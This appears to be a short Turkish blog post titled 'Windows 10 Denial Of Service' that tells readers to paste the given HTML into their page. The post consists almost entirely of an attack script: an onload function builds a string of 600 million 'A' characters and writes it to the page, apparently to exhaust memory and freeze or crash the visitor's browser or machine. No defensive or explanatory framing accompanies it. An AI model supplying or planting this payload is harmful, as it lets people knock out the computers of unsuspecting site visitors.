Windows 10 Denial Of Service Aşağıdaki Komutu Kopyalayıp Html Ögenize Yapıştırınız! <html> <script> function blah() { var buff = '\x41'; var buffer = buff.repeat(600000000); document.write(buffer); } </script> </head> <body onload=blah()> </body> </html>
Post a Comment